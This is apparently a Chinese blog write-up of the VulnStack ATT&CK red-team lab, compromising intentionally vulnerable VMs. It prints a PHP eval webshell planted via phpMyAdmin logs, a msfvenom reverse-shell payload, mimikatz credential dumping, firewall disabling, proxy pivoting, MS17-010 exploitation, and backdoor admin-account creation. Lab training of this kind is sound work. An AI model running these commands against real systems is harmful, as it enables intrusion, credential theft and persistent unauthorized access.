ATT-CK红队评估实战内网靶场(一)

环境搭建

下载地址：漏洞详情 (qiyuanxuetang.net)

Web服务器：Windows7（配有phpstudy，需要自启）（网络配置：仅主机+NAT）

域内主机：Win2K3 Metasploitable（启动时，vm tools出现提示，不用管，全部否或关掉）（网络配置：仅主机）

域控：Windows 2008（网络配置：仅主机）

默认密码均为：hongrisec@2019，修改密码自定

Windows7：192.168.232.132 192.168.52.143

Windows server 2008 : 192.168.52.138

Win2K3 Metasploitable : 192.168.52.141

信息收集

发现Win7外网ip

扫描ip，发现有关端口

入侵

phpmyadmin注马

访问80端口

数据库密码为root，mysql远程连不上

扫描目录发现，/phpmyadmin

登录得到

phpmyadmin后台getshell的常用手段有以下几种方式：

1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell

执行sql语句

1	`show variables like '%secure%';`

发现没有写入权限，无法用select into outfile方法写入shell,只能使用第二种方法

开启日志功能

1	`set global general_log='on';`

修改日志保存路径为C:/phpStudy/WWW/shell.php

1	`set global general_log_file='C:/phpStudy/WWW/shell.php'`

修改成功

注马

1	`SELECT '<?php eval($_POST["a"]);?>'`

蚁剑成功连接

连接后发现还有个yxcms，这里看到有师傅是直接通过cms来getshell，但是我没扫出来yxcms的目录，但是扫出来cms的压缩包，下载解压可以得到，于是猜测还有yxcms,另外数据库里有个newyxcms,去尝试猜也可能得到。

yxcms注马

现在要找到acomment.php，可以通过目录遍历，但是这里建议直接通过之前的cms压缩包解压出来直接搜索

内网渗透

蚁剑虚拟终端ipconfig查看

发现内网c段

Cobalt Strike

Cobalt Strike设置监听端口

上传木马

进行提权

得到system权限

执行net view查看域控主机

查看防火墙状态
shell netsh firewall show state
# 关闭防火墙 
shell netsh advfirewall set allprofiles state off

1	`mimikatz sekurlsa::logonpasswords #获取密码`

成功控制 Windows server 2008

msf

kali生成msf木马，蚁剑上传

1	`msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.134 LPORT=4444 -f exe -o msf.exe`

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.232.134 
set lport 4444 
run

执行getuid查看当前权限，然后getsystem提为system权限

查看端口，发现没有开启3389端口

执行run post/windows/manage/enable_rdp开启3389端口

kali执行命令rdesktop 192.168.232.132

执行load mimikatz，发现只能用kiwi

查看靶机是64位还是32位

执行migrate 488，迁移进程

1	`creds_all #列举所有凭据`

得到密码，即可远程登录

run post/windows/gather/enum_applications查看win7上安装了哪些软件

arp -a查看路由表，发现域内主机

run autoroute -s 192.168.52.0/24添加录路由；

run autoroute -p查看路由；

设置代理

use auxiliary/server/socks_proxy
set srvhost 192.168.232.134
set srvport 1080
run

修改 /etc/proxychains4.conf ,最后一行改为socks4 192.168.232.134 1080

这里没显示连接失败，但代理能访问

信息收集

扫描系统版本，是Windows2003

1
2
3

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.52.141
run

验证发现存在永恒之蓝漏洞；

1
2
3

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.52.141
run

exploit/windows/smb/ms17_010_eternalblue打不了，但是可以使用
auxiliary/admin/smb/ms17_010_command模块执行命令；

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set command whoami
run

远程登录

set command net user blckder02 8888! /add  #添加用户；
set command net localgroup administrators blckder02 /add  #添加管理员权限；
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'  #执行命令开启3389端口，这里要么用单引号把命令引住，要么用反斜杠对反斜杠和引号进行转义，否则会出错；
run
proxychains rdesktop 192.168.52.141  #远程桌面连接成功，可以用添加的用户进行登录；

反弹shell

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.52.141
run

这里可能是之前代理的问题，都没有成功

另一个靶机同理

参考：

ATT&CK实战系列——红队实战(一) - 先知社区 (aliyun.com)

[内网渗透]——VulnStack (一)_vulnstack一-CSDN博客

VulnStack - ATT&CK红队评估实战(一) Writeup - gcc_com - 博客园 (cnblogs.com)

ATT&CK红队评估实战靶场-1 - lca (xlog.app)

ATT-CK红队评估实战内网靶场(一)

http://tmagwaro.github.io/2024/06/07/ATT—CK红队评估实战内网靶场1/

作者

TMagWarO

发布于

2024年6月7日

许可协议

AWD搭建上一篇

ciscn2024 下一篇